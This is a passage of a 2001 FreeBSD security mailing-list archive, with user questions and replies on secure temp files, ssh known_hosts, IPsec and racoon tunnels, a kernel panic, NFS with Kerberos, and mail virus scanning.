From owner-freebsd-security Sun Mar 11 15:14:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-158.dsl.lsan03.pacbell.net [63.207.60.158]) by hub.freebsd.org (Postfix) with ESMTP id 19A3B37B718 for ; Sun, 11 Mar 2001 15:14:45 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C67C366F14; Sun, 11 Mar 2001 15:14:44 -0800 (PST) Date: Sun, 11 Mar 2001 15:14:44 -0800 From: Kris Kennaway To: Greg White Cc: FreeBSD Security Subject: Re: temp files for security/logcheck Message-ID: <20010311151444.A69514@mollari.cthul.hu> References: <200103110435.f2B4ZHw04676@ns1.unixathome.org>; <20010310234519.A68252@databits.net> <200103110447.f2B4lww04741@ns1.unixathome.org> <20010310225345.A14180@mollari.cthul.hu> <20010310230843.A26101@greg.cex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="C7zPtVaVf+AK4Oqc" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010310230843.A26101@greg.cex.ca>; from gregw-freebsd-security@greg.cex.ca on Sat, Mar 10, 2001 at 11:08:43PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --C7zPtVaVf+AK4Oqc Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Mar 10, 2001 at 11:08:43PM -0800, Greg White wrote: > On Sat, Mar 10, 2001 at 10:53:46PM -0800, Kris Kennaway wrote: > > On Sun, Mar 11, 2001 at 05:47:58PM +1300, Dan Langille wrote: > > > AFAIK, the files disappear each time the script is run: > > >=20 > > > umask 077 > > > rm -f $TMPDIR/check.$$ $TMPDIR/checkoutput.$$=20 > >=20 > > [...] > >=20 > > Blah, that's an insecure way to create files in $TMPDIR (which is > > usually /tmp). It needs to use mktemp(1). > >=20 > > Kris >=20 > It is in general, but not in this case. The script and the directory are > mode 0700 -- this makes it difficult for it to be insecure. $TMPDIR is > explicitly set. Okay..I was missing context: $TMPDIR is usually inherited from the user's environment and points to /tmp or whatever their preferred temporary file directory is. I don't like the use of /usr/local for temporary file storage -- that may be on a readonly filesystem. The script needs to use mktemp -d -t to create itself a secure directory to play in. Kris --C7zPtVaVf+AK4Oqc Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rAbkWry0BWjoQKURAmBUAKCWYbz6ncb2+HN7x3IAYoKtO/qQTACgiOuM 9gCN4FYBw/UbhK90b/+ZTkc= =KwUc -----END PGP SIGNATURE----- --C7zPtVaVf+AK4Oqc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 11 16:51: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id AB1C037B718 for ; Sun, 11 Mar 2001 16:50:58 -0800 (PST) (envelope-from meshko@daedalus.cs.brandeis.edu) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id TAA00681 for ; Sun, 11 Mar 2001 19:50:53 -0500 Date: Sun, 11 Mar 2001 19:50:53 -0500 (EST) From: Mikhail Kruk To: Subject: ssh knownhosts ip vs domain name Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a machine which has a dynamic ip. I use dyndns.org dynamic DNS service, so when IP on that machine changes name.dyndns.org points to the new IP. So when I want to ssh to this box, I do ssh name.dyndns.org. However ssh doesn't put name.dyndns.org into the known_hosts file, but rather saves the new ip, which is obivousely not what I want. Is there any way to force it to check by domain name, not by ip? (I'm using OpenSSH_2.3.0p1) thanks mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 11 17:45:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61]) by hub.freebsd.org (Postfix) with ESMTP id B2CDE37B718 for ; Sun, 11 Mar 2001 17:45:23 -0800 (PST) (envelope-from jomor@ahpcns.com) Received: from ahpcns.com (localhost [127.0.0.1]) by shorty.ahpcns.com (Postfix) with ESMTP id CB3643A4C7 for ; Sun, 11 Mar 2001 19:45:20 -0600 (CST) Message-ID: <3AAC2A30.8DA0061D@ahpcns.com> Date: Sun, 11 Mar 2001 19:45:20 -0600 From: jomor Organization: ahpcns X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: IPSEC tunnel & setkey, How do I tell if setkey worked? References: <3AAB2008.E35A125D@ahpcns.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org jomor wrote: > I'm finally trying to get a VPN set up between home (DSL) and work > (T-1). I've been running FreeBSD on my home firewall for a few years and > now I want it to be an IPSEC tunnel endpoint. The other end will be > another freeBSD box first, and maybe eventually a Watchguard firebox2 > firewall "appliance". I'm testing off-line for now. I haven't been able > to find any info on integrating my ipfw rules with the tunnel so I've > got test boxes set up in an "open" firewall config. I figure I'll get > the tunnel up first and then break it while I try different ipfw rules. > Nevermind... I got it figured out (I think). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 11 20:39:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113]) by hub.freebsd.org (Postfix) with ESMTP id E510F37B718; Sun, 11 Mar 2001 20:39:18 -0800 (PST) (envelope-from Bob@Talarian.Com) Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50]) by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id WAA16567; Sun, 11 Mar 2001 22:39:17 -0600 (CST) (envelope-from Bob@Talarian.Com) Message-ID: <3AAC52F4.1000602@Talarian.Com> Date: Sun, 11 Mar 2001 22:39:16 -0600 From: Bob Van Valzah User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215 X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD-Security@FreeBSD.Org Cc: FreeBSD-Questions@FreeBSD.Org Subject: Racoon Problem & Cisco Tunnel Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have several remote FreeBSD users who want to connect their home LANs to my trusted network over an IPSec tunnel via a DSL connection. I'd like my end of the tunnel to terminate on a Cisco if possible. (Though I do have many FreeBSD boxes handy, I just feel better when layer-2 infrastructure doesn't depend on boxes with hard drives.) Any general advice on how to do this would be appreciated. As near as I can tell, I have to run racoon and configure it for pre-shared keys to talk to the cisco. But I don't think the racoon is even starting right. I get this message: "ERROR: pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or directory." Happens with the config files I've written and the stock ones. I'm running a freshly sup'd box with racoon-20010222a built from ports. All help and advice appreciated. Thanks, Bob To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Mar 11 20:50:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtprelay1.adelphia.net (smtprelay1.adelphia.net [64.8.25.6]) by hub.freebsd.org (Postfix) with ESMTP id A58A837B719; Sun, 11 Mar 2001 20:50:09 -0800 (PST) (envelope-from packetwhore@stargate.net) Received: from pa-westmifflin1a-385.pit.adelphia.net ([24.48.239.129]) by smtprelay1.adelphia.net (Netscape Messaging Server 4.15) with ESMTP id GA2IQX00.U4C; Sun, 11 Mar 2001 23:49:45 -0500 Date: Sun, 11 Mar 2001 23:42:59 -0500 (EST) From: pW X-X-Sender: To: Bob Van Valzah Cc: , Subject: Re: Racoon Problem & Cisco Tunnel In-Reply-To: <3AAC52F4.1000602@Talarian.Com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Out of curiosity... do your DSL users have public static IPs? I work at an ISP and almost all of our DSL customers have static private IPs and use NAT for public ones... just wondering because you may have to enable some sort of NAT transparency otherwise it may break the VPN... just a thought... shawn On Sun, 11 Mar 2001, Bob Van Valzah wrote: > I have several remote FreeBSD users who want to connect their home LANs > to my trusted network over an IPSec tunnel via a DSL connection. I'd > like my end of the tunnel to terminate on a Cisco if possible. (Though I > do have many FreeBSD boxes handy, I just feel better when layer-2 > infrastructure doesn't depend on boxes with hard drives.) Any general > advice on how to do this would be appreciated. > > As near as I can tell, I have to run racoon and configure it for > pre-shared keys to talk to the cisco. But I don't think the racoon is > even starting right. I get this message: "ERROR: > pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or > directory." Happens with the config files I've written and the stock > ones. I'm running a freshly sup'd box with racoon-20010222a built from > ports. > > All help and advice appreciated. > > Thanks, > > Bob > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 1:38:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from gyw.com (gyw.com [209.55.67.177]) by hub.freebsd.org (Postfix) with ESMTP id 2B58137B718 for ; Mon, 12 Mar 2001 01:38:25 -0800 (PST) (envelope-from tjk@tksoft.com) Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged)) by gyw.com (8.8.8/8.8.8) with ESMTP id BAA11155; Mon, 12 Mar 2001 01:54:07 -0800 Received: (from tjk@tksoft.com) by smtp3.tksoft.com (8.8.8/8.8.8) id BAA18994; Mon, 12 Mar 2001 01:34:20 -0800 From: "tjk@tksoft.com" Message-Id: <200103120934.BAA18994@smtp3.tksoft.com> Subject: Re: ssh knownhosts ip vs domain name To: meshko@cs.brandeis.edu (Mikhail Kruk) Date: Mon, 12 Mar 2001 01:34:20 -0800 (PST) Cc: security@FreeBSD.ORG In-Reply-To: from "Mikhail Kruk" at Mar 11, 2001 07:50:53 PM X-Info: None MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Edit the known_hosts file by hand. Troy > > I have a machine which has a dynamic ip. I use dyndns.org dynamic DNS > service, so when IP on that machine changes name.dyndns.org points to the > new IP. So when I want to ssh to this box, I do ssh name.dyndns.org. > However ssh doesn't put name.dyndns.org into the known_hosts file, but > rather saves the new ip, which is obivousely not what I want. > Is there any way to force it to check by domain name, not by ip? > > (I'm using OpenSSH_2.3.0p1) > > thanks > mk > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 2: 4:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp12.singnet.com.sg (smtp12.singnet.com.sg [165.21.6.32]) by hub.freebsd.org (Postfix) with ESMTP id C878437B718 for ; Mon, 12 Mar 2001 02:04:39 -0800 (PST) (envelope-from spades@galaxynet.org) Received: from bryan (ad202.166.105.169.magix.com.sg [202.166.105.169]) by smtp12.singnet.com.sg (8.11.2/8.11.2) with SMTP id f2CA4dC02444 for ; Mon, 12 Mar 2001 18:04:39 +0800 (SGT) Message-Id: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg> X-Sender: spades@smtp.magix.com.sg X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Mon, 12 Mar 2001 18:14:08 +0800 To: freebsd-security@freebsd.org From: Spades Subject: rebooting error Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What kinda error gives this? > Fatal trap 12: page fault while in kernel mode > fault virtual address = 0xbffa6a40 > fault code = supervisor write, page not present > instruction pointer = 0x8:0xc03093a1 > stack pointer = 0x10:0xd6398c7c > frame pointer = 0x10:0xd6398c7c > code segment = base 0x0, limit 0xfffff, type 0x1b > = DPL 0, pres 1, def32 1, gran 1 > processor eflags = interrupt enabled, resume, IOPL = 0 > current process = 45257 (gcc) > interrupt mask = bio > trap number = 12 > panic: page fault > > syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 2:56:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 259D037B718 for ; Mon, 12 Mar 2001 02:56:14 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 5829 invoked by uid 1000); 12 Mar 2001 10:55:37 -0000 Date: Mon, 12 Mar 2001 12:55:37 +0200 From: Peter Pentchev To: Spades Cc: freebsd-security@freebsd.org Subject: Re: rebooting error Message-ID: <20010312125537.A469@ringworld.oblivion.bg> Mail-Followup-To: Spades , freebsd-security@freebsd.org References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>; from spades@galaxynet.org on Mon, Mar 12, 2001 at 06:14:08PM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 12, 2001 at 06:14:08PM +0800, Spades wrote: > What kinda error gives this? Only you can tell us that; look at http://www.FreeBSD.org/handbook/kerneldebug.html for a start :) G'luck, Peter -- This sentence contains exactly threee erors. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 8: 8: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113]) by hub.freebsd.org (Postfix) with ESMTP id 6256937B719; Mon, 12 Mar 2001 08:08:01 -0800 (PST) (envelope-from Bob@Talarian.Com) Received: from Talarian.Com (NewStorm.whitebarn.com [216.0.13.77]) by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id KAA22877; Mon, 12 Mar 2001 10:07:58 -0600 (CST) (envelope-from Bob@Talarian.Com) Message-ID: <3AACF40D.4080504@Talarian.Com> Date: Mon, 12 Mar 2001 10:06:37 -0600 From: Bob Van Valzah User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215 X-Accept-Language: en MIME-Version: 1.0 To: pW Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org Subject: Re: Racoon Problem & Cisco Tunnel References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes. The five DSL setups with which I'm familiar all grant at least one public address per house. I believe all are static, but one might be dynamic. Interference with protocols like IPSec is one of the reasons why I'd make a public address a requirement when choising a DSL provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all possible. Let's hasten the deployment of IPv6. Bob pW wrote: > Out of curiosity... > do your DSL users have public static IPs? I work at an ISP and almost all > of our DSL customers have static private IPs and use NAT for public > ones... just wondering because you may have to enable some sort of NAT > transparency otherwise it may break the VPN... > > just a thought... > > shawn > > On Sun, 11 Mar 2001, Bob Van Valzah wrote: > >> I have several remote FreeBSD users who want to connect their home LANs >> to my trusted network over an IPSec tunnel via a DSL connection. I'd >> like my end of the tunnel to terminate on a Cisco if possible. (Though I >> do have many FreeBSD boxes handy, I just feel better when layer-2 >> infrastructure doesn't depend on boxes with hard drives.) Any general >> advice on how to do this would be appreciated. >> >> As near as I can tell, I have to run racoon and configure it for >> pre-shared keys to talk to the cisco. But I don't think the racoon is >> even starting right. I get this message: "ERROR: >> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or >> directory." Happens with the config files I've written and the stock >> ones. I'm running a freshly sup'd box with racoon-20010222a built from >> ports. >> >> All help and advice appreciated. >> >> Thanks, >> >> Bob >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 10:13:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 1B0D737B719 for ; Mon, 12 Mar 2001 10:13:06 -0800 (PST) (envelope-from jhb@FreeBSD.org) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f2CICwA80390; Mon, 12 Mar 2001 10:12:58 -0800 (PST) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg> Date: Mon, 12 Mar 2001 10:12:38 -0800 (PST) From: John Baldwin To: Spades Subject: RE: rebooting error Cc: freebsd-security@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 12-Mar-01 Spades wrote: > What kinda error gives this? Either a bug in the kernel, or possibly bad hardware (could be bad memory, disk, CPU, etc.). Can you reproduce it, and is it always the same set of messages? >> Fatal trap 12: page fault while in kernel mode >> fault virtual address = 0xbffa6a40 >> fault code = supervisor write, page not present >> instruction pointer = 0x8:0xc03093a1 >> stack pointer = 0x10:0xd6398c7c >> frame pointer = 0x10:0xd6398c7c >> code segment = base 0x0, limit 0xfffff, type 0x1b >> = DPL 0, pres 1, def32 1, gran 1 >> processor eflags = interrupt enabled, resume, IOPL = 0 >> current process = 45257 (gcc) >> interrupt mask = bio >> trap number = 12 >> panic: page fault >> >> syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132 > 132 132 132 132 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 10:19:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from polaris.we.lc.ehu.es (polaris.we.lc.ehu.es [158.227.6.43]) by hub.freebsd.org (Postfix) with ESMTP id 050D237B718 for ; Mon, 12 Mar 2001 10:19:32 -0800 (PST) (envelope-from jose@we.lc.ehu.es) Received: from v-ger.we.lc.ehu.es (v-ger [158.227.6.179]) by polaris.we.lc.ehu.es (8.11.1/8.11.1) with ESMTP id f2CIJT906785 for ; Mon, 12 Mar 2001 19:19:29 +0100 (MET) Received: from we.lc.ehu.es (localhost [127.0.0.1]) by v-ger.we.lc.ehu.es (8.11.1/8.11.1) with ESMTP id f2CHvr700734 for ; Mon, 12 Mar 2001 18:57:53 +0100 (CET) (envelope-from jose@we.lc.ehu.es) Message-ID: <3AAD0E21.4EDB1E4C@we.lc.ehu.es> Date: Mon, 12 Mar 2001 18:57:53 +0100 From: "Jose M. Alcaide" Organization: Universidad del Pais Vasco - Dpto. de Electricidad y Electronica X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: es-ES, es, en-US, en MIME-Version: 1.0 To: security@FreeBSD.org Subject: NFS and kerberos? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I want to authenticate NFS clients on an NFS server (all of them running FreeBSD 4.3). I found that SecureRPC is not an option, but I also found the "-kerb" flag in exports(5). However, the manpage says: The -kerb option specifies that the Kerberos authentication server should be used to authenticate and map client credentials. This option requires that the kernel be built with the NFSKERB option. The use of this option will prevent the kernel from compiling unless calls to the appropriate Kerberos encryption routines are provided in the NFS source. I searched sys/nfs/* for NFSKERB and indeed I found some "XXX" placeholders parenthesized by "#ifdef NFSKERB" for -I think- those calls to the Kerberos encryption routines. Obviously the kernel cannot be compiled if NFSKERB is #define'd. My question is: can I use kerberos for NFS client authentication? If I cannot, then I'll welcome any suggestions about how to share file systems with authenticated clients. TIA, -- JMA ****** Jose M. Alcaide // jose@we.lc.ehu.es // jmas@FreeBSD.org ****** ** "Beware of Programmers who carry screwdrivers" -- Leonard Brandwein ** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 13:59:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 4613037B719 for ; Mon, 12 Mar 2001 13:59:31 -0800 (PST) (envelope-from mit@mitayai.net) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.2/8.11.2) with SMTP id f2CLxUe14305 for ; Mon, 12 Mar 2001 16:59:30 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: Subject: Virus Scanning Software for FreeBSD Date: Mon, 12 Mar 2001 16:56:43 -0500 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0019_01C0AB15.6AA82040" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0019_01C0AB15.6AA82040 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Is anyone aware of any virus scanning solutions for freebsd, particularly solutions for email? I don;t trust my users not to follow proper email guidelines, and thus would like to stop email at the server before they get delivered the message. Regards, Mit -- Will Mitayai Keeso Rowe For full contact information, please visit: http://my.infotriever.com/mitayai ------=_NextPart_000_0019_01C0AB15.6AA82040 Content-Type: text/x-vcard; name="Will Mitayai Keeso Rowe.vcf" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="Will Mitayai Keeso Rowe.vcf" BEGIN:VCARD VERSION:2.1 N:Rowe;Will;Mitayai Keeso FN:Will Mitayai Keeso Rowe NICKNAME:Mitayai ORG:Mitayai.Net TITLE:President NOTE:=20 TEL;WORK;VOICE:(416) 934-9404 TEL;HOME;VOICE:(416) 934-0349 TEL;CELL;VOICE:(416) 561-1616 TEL;WORK;FAX:(253) 541-9915 ADR;WORK:;;#9-552 Church Street;Toronto;ON;M4Y 2E4;Canada LABEL;WORK;ENCODING=3DQUOTED-PRINTABLE:#9-552 Church = Street=3D0D=3D0AToronto, ON M4Y 2E4=3D0D=3D0ACanada ADR;HOME:;;;;;;Canada LABEL;HOME:Canada URL:http://www.mitayai.net/ BDAY:19701012 EMAIL;PREF;INTERNET:mit@mitayai.net REV:20010224T192609Z END:VCARD ------=_NextPart_000_0019_01C0AB15.6AA82040-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14: 4:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 6BD3C37B718 for ; Mon, 12 Mar 2001 14:04:52 -0800 (PST) (envelope-from traviso@RapidNet.com) Received: from localhost (traviso@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id PAA76524; Mon, 12 Mar 2001 15:04:48 -0700 (MST) Date: Mon, 12 Mar 2001 15:04:48 -0700 (MST) From: "Travis [Admin Team]" To: Will Mitayai Keeso Rowe Cc: freebsd-security@freebsd.org Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote: > Is anyone aware of any virus scanning solutions for freebsd, particularly > solutions for email? I don;t trust my users not to follow proper email > guidelines, and thus would like to stop email at the server before they get > delivered the message. Greetings Mit, check out the ports collections - I believe there are two and one front end. To be sure go to freebsd.org and click on ported applications - search for virus. Travis /* -=[ Travis Ogden ]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= RapidNet Admin Team "Courage is not defined by those who Phone#: 605.341.3283 fought and did not fall, but by those ICQ#: 30220771 who fought, fell, and rose again." Mail: traviso@RapidNet.com Fax#: 605.348.1031 Web: www.RapidNet.com/~traviso 800#: 800.763.2525 ATTENTION! "RapidNet has moved to 330 Knollwood Drive, Rapid City, SD 57701." -=-=-=-=-=-=-=-=-=-=-=-=-=-[ traviso@rapidnet.com ]=-=-=-=-= */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14: 9:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id C7A9937B719 for ; Mon, 12 Mar 2001 14:09:18 -0800 (PST) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2CM91077302; Mon, 12 Mar 2001 17:09:01 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Mon, 12 Mar 2001 17:08:57 -0500 (EST) From: Rob Simmons To: Will Mitayai Keeso Rowe Cc: Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Take a look at amavis-perl-10, inflex-0.1.5.c, and uvscan-4.07e. They are in the ports collection. uvscan-4.07e is an eval and you have to pay for it eventually, but there aren't any opensource scanning engines that I know of. The other two are interfaces for something like uvscan-4.07e. Robert Simmons Systems Administrator http://www.wlcg.com/ On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote: > Is anyone aware of any virus scanning solutions for freebsd, particularly > solutions for email? I don;t trust my users not to follow proper email > guidelines, and thus would like to stop email at the server before they get > delivered the message. > > Regards, > Mit > > -- > Will Mitayai Keeso Rowe > > For full contact information, please visit: > http://my.infotriever.com/mitayai > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rUj9v8Bofna59hYRAjq+AJ9Wbc5o0Znrjx8RPcVybyEogUr7wwCeM/md I49PRXYh8iBIjAAgxgmXrp0= =Hp2V -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14:11: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3]) by hub.freebsd.org (Postfix) with ESMTP id B3B7E37B71B for ; Mon, 12 Mar 2001 14:10:53 -0800 (PST) (envelope-from newton@atdot.dotat.org) Received: (from newton@localhost) by atdot.dotat.org (8.11.0/8.9.3) id f2CMMeq24143; Tue, 13 Mar 2001 08:52:40 +1030 (CST) (envelope-from newton) Date: Tue, 13 Mar 2001 08:52:40 +1030 From: Mark Newton To: Will Mitayai Keeso Rowe Cc: freebsd-security@freebsd.org Subject: Re: Virus Scanning Software for FreeBSD Message-ID: <20010313085240.A24044@atdot.dotat.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mit@mitayai.net on Mon, Mar 12, 2001 at 04:56:43PM -0500 X-PGP-Key: http://slash.dotat.org/~newton/pgpkey.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 12, 2001 at 04:56:43PM -0500, Will Mitayai Keeso Rowe wrote: > Is anyone aware of any virus scanning solutions for freebsd, particularly > solutions for email? I don;t trust my users not to follow proper email > guidelines, and thus would like to stop email at the server before they get > delivered the message. There's a sourceforge project called AMaViS - http://www.amavis.org We're using it at work; It seems to do the right thing. - mark -------------------------------------------------------------------- I tried an internal modem, newton@atdot.dotat.org but it hurt when I walked. Mark Newton ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- To 